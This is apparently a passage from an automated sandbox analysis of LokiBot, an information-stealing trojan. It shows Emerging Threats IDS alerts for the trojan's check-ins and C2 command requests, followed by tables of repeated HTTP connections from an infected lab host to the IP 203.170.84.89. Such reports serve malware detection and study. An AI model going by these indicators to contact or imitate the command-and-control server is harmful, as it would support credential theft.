                                          02/22/21-19:14:47.730697TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985180192.168.2.4203.170.84.89
                                          02/22/21-19:14:47.730697TCP2025381ET TROJAN LokiBot Checkin4985180192.168.2.4203.170.84.89
                                          02/22/21-19:14:49.051550TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985280192.168.2.4203.170.84.89
                                          02/22/21-19:14:49.051550TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985280192.168.2.4203.170.84.89
                                          02/22/21-19:14:49.051550TCP2025381ET TROJAN LokiBot Checkin4985280192.168.2.4203.170.84.89
                                          02/22/21-19:14:50.340811TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985380192.168.2.4203.170.84.89
                                          02/22/21-19:14:50.340811TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985380192.168.2.4203.170.84.89
                                          02/22/21-19:14:50.340811TCP2025381ET TROJAN LokiBot Checkin4985380192.168.2.4203.170.84.89
                                          02/22/21-19:14:51.621970TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985480192.168.2.4203.170.84.89
                                          02/22/21-19:14:51.621970TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985480192.168.2.4203.170.84.89
                                          02/22/21-19:14:51.621970TCP2025381ET TROJAN LokiBot Checkin4985480192.168.2.4203.170.84.89
                                          02/22/21-19:14:52.907812TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985580192.168.2.4203.170.84.89
                                          02/22/21-19:14:52.907812TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985580192.168.2.4203.170.84.89
                                          02/22/21-19:14:52.907812TCP2025381ET TROJAN LokiBot Checkin4985580192.168.2.4203.170.84.89
                                          02/22/21-19:14:54.200425TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985680192.168.2.4203.170.84.89
                                          02/22/21-19:14:54.200425TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985680192.168.2.4203.170.84.89
                                          02/22/21-19:14:54.200425TCP2025381ET TROJAN LokiBot Checkin4985680192.168.2.4203.170.84.89
                                          02/22/21-19:14:55.486345TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985780192.168.2.4203.170.84.89
                                          02/22/21-19:14:55.486345TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985780192.168.2.4203.170.84.89
                                          02/22/21-19:14:55.486345TCP2025381ET TROJAN LokiBot Checkin4985780192.168.2.4203.170.84.89
                                          02/22/21-19:14:56.748663TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985880192.168.2.4203.170.84.89
                                          02/22/21-19:14:56.748663TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985880192.168.2.4203.170.84.89
                                          02/22/21-19:14:56.748663TCP2025381ET TROJAN LokiBot Checkin4985880192.168.2.4203.170.84.89

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                          Feb 22, 2021 19:13:10.095177889 CET8049752203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:10.095268965 CET4975280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:10.411180973 CET4975380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:10.433692932 CET8049752203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:10.745512009 CET8049753203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:10.746390104 CET4975380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:10.753897905 CET4975380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:11.089250088 CET8049753203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:11.089572906 CET4975380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:11.423415899 CET8049753203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:11.455200911 CET8049753203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:11.455538988 CET8049753203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:11.455585003 CET4975380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:11.455646038 CET4975380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:11.787161112 CET4975480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:11.789374113 CET8049753203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:12.124365091 CET8049754203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:12.124721050 CET4975480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:12.128792048 CET4975480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:12.465698957 CET8049754203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:12.465974092 CET4975480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:12.802908897 CET8049754203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:12.833798885 CET8049754203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:12.833843946 CET8049754203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:12.833997965 CET4975480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:12.834304094 CET4975480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:13.102169991 CET4975580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:13.171260118 CET8049754203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:13.439296007 CET8049755203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:13.439465046 CET4975580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:13.445902109 CET4975580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:13.780642033 CET8049755203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:13.780885935 CET4975580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:14.115390062 CET8049755203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:14.146862984 CET8049755203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:14.147129059 CET8049755203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:14.147218943 CET4975580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:14.147289991 CET4975580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:14.413026094 CET4975680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:14.484185934 CET8049755203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:14.748071909 CET8049756203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:14.748253107 CET4975680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:14.755155087 CET4975680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:15.090065956 CET8049756203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:15.090272903 CET4975680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:15.426881075 CET8049756203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:15.458630085 CET8049756203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:15.458960056 CET8049756203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:15.458975077 CET4975680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:15.459064007 CET4975680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:15.755651951 CET4975780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:15.793590069 CET8049756203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:16.090509892 CET8049757203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:16.090735912 CET4975780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:16.098573923 CET4975780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:16.432708979 CET8049757203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:16.432831049 CET4975780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:16.767677069 CET8049757203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:16.800559998 CET8049757203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:16.800817013 CET8049757203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:16.801059961 CET4975780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:16.801105976 CET4975780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:17.065048933 CET4975880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:17.135082960 CET8049757203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:17.399919987 CET8049758203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:17.400228977 CET4975880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:17.407438040 CET4975880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:17.742444038 CET8049758203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:17.742592096 CET4975880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:18.077526093 CET8049758203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:18.107852936 CET8049758203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:18.108020067 CET8049758203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:18.108274937 CET4975880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:18.108316898 CET4975880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:18.401227951 CET4975980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:18.445224047 CET8049758203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:18.735865116 CET8049759203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:18.736078024 CET4975980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:18.738996983 CET4975980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:19.073792934 CET8049759203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:19.073930979 CET4975980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:19.410026073 CET8049759203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:19.442205906 CET8049759203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:19.442343950 CET8049759203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:19.442392111 CET4975980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:19.442436934 CET4975980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:19.702821970 CET4976080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:19.777086973 CET8049759203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:20.038129091 CET8049760203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:20.039377928 CET4976080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:20.041934967 CET4976080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:20.379132032 CET8049760203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:20.379368067 CET4976080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:20.714682102 CET8049760203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:20.749983072 CET8049760203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:20.750186920 CET8049760203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:20.750284910 CET4976080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:20.751328945 CET4976080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:20.986237049 CET4976380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:21.084209919 CET8049760203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:21.330612898 CET8049763203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:21.330755949 CET4976380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:21.333542109 CET4976380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:21.678126097 CET8049763203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:21.678217888 CET4976380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:22.022650003 CET8049763203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:22.060681105 CET8049763203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:22.060791969 CET8049763203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:22.060870886 CET4976380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:22.060893059 CET4976380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:22.326782942 CET4976480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:22.405149937 CET8049763203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:22.662787914 CET8049764203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:22.666702986 CET4976480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:22.669300079 CET4976480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:23.004756927 CET8049764203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:23.005808115 CET4976480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:23.342444897 CET8049764203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:23.380831003 CET8049764203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:23.381267071 CET8049764203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:23.381556988 CET4976480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:23.381613016 CET4976480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:23.661341906 CET4976580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:23.715451002 CET8049764203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:24.008467913 CET8049765203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:24.008788109 CET4976580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:24.013552904 CET4976580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:24.359091043 CET8049765203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:24.359314919 CET4976580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:24.704896927 CET8049765203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:24.744710922 CET8049765203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:24.744851112 CET8049765203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:24.745059967 CET4976580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:24.752625942 CET4976580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:25.015988111 CET4976680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:25.097785950 CET8049765203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:25.350769043 CET8049766203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:25.350940943 CET4976680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:25.353621006 CET4976680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:25.688349962 CET8049766203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:25.689847946 CET4976680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:26.024589062 CET8049766203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:26.056929111 CET8049766203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:26.057013988 CET8049766203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:26.057090998 CET4976680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:26.057135105 CET4976680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:26.393157959 CET8049766203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:26.616674900 CET4976780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:26.950714111 CET8049767203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:26.950912952 CET4976780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:26.968743086 CET4976780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:27.304668903 CET8049767203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:27.304826021 CET4976780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:27.640516996 CET8049767203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:27.672360897 CET8049767203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:27.672501087 CET8049767203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:27.672765970 CET4976780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:27.676024914 CET4976780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:27.935020924 CET4976880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:28.009938955 CET8049767203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:28.275243998 CET8049768203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:28.275461912 CET4976880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:28.278127909 CET4976880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:28.616240025 CET8049768203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:28.616413116 CET4976880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:28.954262972 CET8049768203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:28.982165098 CET8049768203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:28.982373953 CET4976880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:28.982688904 CET8049768203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:28.982788086 CET4976880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:29.242129087 CET4976980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:29.320180893 CET8049768203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:29.576837063 CET8049769203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:29.577001095 CET4976980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:29.579658985 CET4976980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:29.915239096 CET8049769203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:29.916177034 CET4976980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:30.252321005 CET8049769203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:30.280127048 CET8049769203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:30.280208111 CET8049769203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:30.280438900 CET4976980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:30.280510902 CET4976980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:30.549227953 CET4977080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:30.617152929 CET8049769203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:30.889718056 CET8049770203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:30.889955044 CET4977080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:30.894737959 CET4977080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:31.232312918 CET8049770203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:31.232486963 CET4977080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:31.570513010 CET8049770203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:31.604202986 CET8049770203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:31.604316950 CET8049770203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:31.604537010 CET4977080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:31.604582071 CET4977080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:31.843086004 CET4977180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:31.941739082 CET8049770203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:32.181655884 CET8049771203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:32.181778908 CET4977180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:32.184418917 CET4977180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:32.523078918 CET8049771203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:32.523749113 CET4977180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:32.862390041 CET8049771203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:32.894319057 CET8049771203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:32.894535065 CET8049771203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:32.894649982 CET4977180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:32.894702911 CET4977180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:33.148340940 CET4977280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:33.234484911 CET8049771203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:33.486393929 CET8049772203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:33.487659931 CET4977280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:33.518151999 CET4977280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:33.856565952 CET8049772203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:33.856682062 CET4977280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:34.197129965 CET8049772203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:34.233598948 CET8049772203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:34.233731985 CET4977280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:34.233937025 CET8049772203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:34.234014034 CET4977280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:34.476284981 CET4977380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:34.571679115 CET8049772203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:34.811100960 CET8049773203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:34.811291933 CET4977380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:34.813981056 CET4977380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:35.148715019 CET8049773203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:35.148798943 CET4977380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:35.483243942 CET8049773203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:35.516104937 CET8049773203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:35.516218901 CET4977380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:35.516390085 CET8049773203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:35.516454935 CET4977380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:35.751740932 CET4977480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:35.850940943 CET8049773203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:36.090656042 CET8049774203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:36.092713118 CET4977480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:36.095386982 CET4977480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:36.434298038 CET8049774203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:36.434465885 CET4977480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:36.772480011 CET8049774203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:36.808944941 CET8049774203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:36.809072971 CET8049774203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:36.809089899 CET4977480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:36.809144020 CET4977480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:37.037193060 CET4977780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:37.146209955 CET8049774203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:37.371900082 CET8049777203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:37.372172117 CET4977780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:37.374891996 CET4977780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:37.711095095 CET8049777203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:37.711201906 CET4977780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:38.045665026 CET8049777203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:38.080215931 CET8049777203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:38.080427885 CET4977780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:38.080514908 CET8049777203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:38.080599070 CET4977780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:38.346273899 CET4978180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:38.415015936 CET8049777203.170.84.89192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 22, 2021 19:13:38.680960894 CET | 80 | 49781 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:38.681087971 CET | 49781 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:38.688700914 CET | 49781 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:39.023277998 CET | 80 | 49781 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:39.023402929 CET | 49781 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:39.357800007 CET | 80 | 49781 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:39.392492056 CET | 80 | 49781 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:39.392525911 CET | 80 | 49781 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:39.392606974 CET | 49781 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:39.392674923 CET | 49781 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:39.640938997 CET | 49784 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:39.727544069 CET | 80 | 49781 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:39.975528955 CET | 80 | 49784 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:39.975697994 CET | 49784 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:39.984081984 CET | 49784 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:40.320708036 CET | 80 | 49784 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:40.320997953 CET | 49784 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:40.655272007 CET | 80 | 49784 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:40.691271067 CET | 80 | 49784 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:40.691379070 CET | 49784 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:40.691643953 CET | 80 | 49784 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:40.691735983 CET | 49784 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:40.959562063 CET | 49788 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:41.025378942 CET | 80 | 49784 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:41.297840118 CET | 80 | 49788 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:41.297950029 CET | 49788 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:41.300879002 CET | 49788 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:41.637674093 CET | 80 | 49788 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:41.637780905 CET | 49788 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:41.975538015 CET | 80 | 49788 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:42.004107952 CET | 80 | 49788 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:42.004211903 CET | 80 | 49788 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:42.004328012 CET | 49788 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:42.005177021 CET | 49788 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:42.243577957 CET | 49790 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:42.341739893 CET | 80 | 49788 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:42.581017971 CET | 80 | 49790 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:42.581176043 CET | 49790 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:42.586766958 CET | 49790 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:42.921617985 CET | 80 | 49790 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:42.921735048 CET | 49790 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:43.256527901 CET | 80 | 49790 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:43.288108110 CET | 80 | 49790 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:43.288283110 CET | 49790 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:43.288481951 CET | 80 | 49790 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:43.292408943 CET | 49790 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:43.534276962 CET | 49792 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:43.622981071 CET | 80 | 49790 | 203.170.84.89 | 192.168.2.4
